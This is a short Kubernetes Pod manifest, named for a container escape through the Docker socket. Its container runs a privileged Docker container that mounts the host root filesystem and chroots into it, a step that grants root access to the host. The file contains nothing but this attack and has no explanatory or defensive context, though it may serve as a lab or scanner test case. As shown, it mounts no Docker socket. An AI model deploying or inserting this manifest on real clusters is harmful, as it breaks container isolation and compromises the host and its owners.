apiVersion: v1
kind: Pod
metadata:
  name: container-escape-using-docker-socket
spec:
  restartPolicy: Never
  containers:
  - name: container-escape-using-docker-socket
    image: angelrita/base-ubuntu:latest
    #imagePullPolicy: Never
    command: ['sh']
    args: ['-c', 'docker run --rm -it --privileged -v /:/mnt alpine chroot /mnt']
